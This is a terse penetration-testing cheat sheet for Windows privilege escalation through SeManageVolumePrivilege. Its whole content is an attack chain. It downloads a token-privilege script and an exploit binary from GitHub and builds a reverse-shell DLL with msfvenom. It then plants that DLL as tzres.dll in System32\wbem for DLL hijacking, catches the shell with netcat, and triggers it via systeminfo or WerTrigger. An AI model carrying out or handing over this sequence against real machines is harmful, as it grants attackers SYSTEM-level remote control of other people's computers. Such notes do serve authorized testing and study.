SeManageVolumePrivilege
wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1
Import-Module .\EnableAllTokenPrivs.ps1
whoami /privdll hijack with metasploit
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1337 -f dll -o tzres.dll
copy tzres.dll C:\Windows\System32\wbem\
systeminfo
rlwrap -cAr nc -lnvp 1337
WerTrigger

Last updated